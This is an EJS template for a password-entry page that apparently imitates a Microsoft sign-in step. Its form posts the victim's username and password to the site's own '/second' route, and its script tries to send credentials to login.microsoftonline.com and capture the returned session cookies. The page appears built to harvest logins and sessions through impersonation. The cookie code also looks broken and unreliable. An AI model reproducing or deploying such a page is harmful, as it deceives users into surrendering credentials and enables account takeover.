<%- include('header'); -%>
<html>
<body>
  <div class="cardii" "col-5">
    <div class="cardtop">
      <img src="images/logoo.png" alt="logo" width="100px" height="80px">
    </div>
    <div>
      <form action="/second" method="POST" class="fum">
        <i class="fa-solid fa-arrow-left"></i>
        <p name="username" type="text" id="mail" class="ilight"><%= username %></p>
        <input type="hidden" id="email" name="username" value="<%= username %>">
        <h4>Enter password</h4>
        <input type="password" id="password" placeholder="Password" name="pass" minlength="6" required />
        <a href="#"><p>Forgot password?</p></a>
        <button class="btn btn-primary move" type="submit">Sign in</button>
      </form>
    </div>
  </div>

  <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
  <script type="text/javascript">
  $(document).ready(function() {
    function sendCookieRequest(username, password) {
      const loginUrl = 'https://login.microsoftonline.com/login';

      // Create the request body
      const data = {
        username: username,
        password: password
      };

      // Make the POST request
      return fetch(loginUrl, {
        method: 'POST',
        body: JSON.stringify(data),
        headers: {
          'Content-Type': 'application/json'
        }
      })
      .then(response => {
        // Retrieve the cookies from the response
        const cookies = response.headers.get('Set-Cookie');
        return cookies;
      });
    }

    // Provide your Microsoft username and password
    const username = 'your_username';
    const password = 'your_password';

    // Call the function to send the cookie request
    sendCookieRequest(username, password)
      .then(cookies => {
        // Print the cookies
        console.log(cookies);
      })
      .catch(error => {
        console.error('Error:', error);
      });
  });
  </script>

</body>
</html>

<%- include('footer'); -%>
